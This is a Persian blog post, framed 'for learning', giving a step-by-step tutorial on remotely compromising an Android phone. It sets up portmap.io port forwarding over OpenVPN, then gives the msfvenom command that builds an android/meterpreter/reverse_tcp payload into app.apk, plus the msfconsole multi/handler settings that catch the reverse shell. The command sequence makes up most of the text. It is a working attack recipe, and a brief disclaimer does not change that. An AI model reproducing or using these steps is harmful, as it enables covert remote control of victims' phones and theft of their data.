خواندن ۳ دقیقه·۵ سال پیش

نفوذ به اندروید-برای یادگیری

امروز روش نفوذ به یک اندروید رو می خواهیم بگیم، اما چطوری؟

این نکته را در نظر بگیرد که ممکن برروی بعضی از سمارت فون ها این روش نفوذ جواب ندهد.

اگر به دنبال هک همسایه امدی؟ اشتباه امدی!

معمولا ابزارهای زیادی هستند که در کالی لینوکس برای اینکار استفاده می‌شود و تمام اموزش های برروی localshot انجام می‌شود ولی اگر بخواهیم از طریق اینترنت به هدفمون دسترسی داشته باشیم چی؟

همانطور که میدونید ای پی های که برروی رایانه های شخصی تنظیم می‌شود ای‌پی های محلی به انها گفته می شود و بیرون از محدوده‌ای مودم یا اینترنت قابل دسترس نیست.

یک روش اینکه یک سروری داشته باشیم که هزینه ای زیادی دارد و نمی صرفه، دو راه دیگر می‌ماند

یکی استفاده از سایت مثل portmap که port forwarding را انجام میدهد استفاده کنیم (خیلی ساده بگیم دری برای دسترسی به اینترنت می‌دهد)

روش دیگر این است که رایانه خود را تبدیل به سرور کنید، البته نکه بریم یک ای پی عمومی بخریم، از ای پی عمومی که خود ISP به ما داده استفاده کنیم. وقتی توی اینترنت جلمه ی whatis my ip جستجو می‌کنید ای پی عمومی به نمایش در می‌اید.

برای روش اول به سایت میریم یک حساب کاربری بازمی‌کنیم بعد از قسمت config یک پیکربندی برای open vpn درست می‌کنیم.

بعد به قسمت mapping ruls می‌ریم تا پورت اضافه می ‌کنیم:

یک پورت برای

port on portmap.io

and

port on your pc

هر عددی که می خواهید را می‌دهید برروی create کلیک می‌کنید.

حالا اون فایل openvpn را که در config ساخته بود را دانلود و با دستور زیر به ان متصل می شویم:

openvpn -config  yourfilename.ovpn

البته سرویس openvpn باید نصب باشد:

apt-get install openvpn

حالا هم میریم سراغ ابزاری که برای نفوذ می‌خواهیم استفاده کنیم به نام msfvenom:

اولی از همه:

service postgresql start
and:

msfvenom  android/meterpreter/reverse_tcp lhost=link_add lport=link_port > app.apk

نکته بجای link_port و link-add ادرس های که از سایت گرفتیم در قست ruls استفاده می‌کنیم:

msfconsole

حالا وقت پیکربندی گیرنده رایانه خودمون است:

use multi/handler

set payload android/meterpreter/reverse_tcp

پورت ها رو تنظیم می کنیم:

set lhost local ip

set lport portlocal

نکته portlocal که می‌دهیم باید با پورت که برروی سایت در قسمت port on your pc داده ایم یکی باشد، localip هم ای پی محلی خود را می‌دهیم.

در اخر هم برای دسترسی به هدفمون دستور زیر را اجرا می‌کنیم:

exploit

این روش تنها بعدی که دارد هربار باید با openvpn به سرور متصل شویم.

نکته جذاب اینکه تازه گی ها API اضافه شده که تمامی کارهای ساخت openvpn و rule را از طریق برنامه نویسی می‌تونیم این کار انجام بدیم. خیلی هم جذاب چنین برنامه ای را با پایتون بنویسم، یکبار امتحان کنید البته شاید بعدا درباره استفاده از API صحبتی کردیم.

کالی لینوکس هک پورت فورواردینگ msfvenom درک از بزارها کالی لینوکس

Elias Rouhani

نویسنده های خوب کسانی هستند که به خوبی رونویسی می‌کنند

شاید از این پست‌ها خوشتان بیاید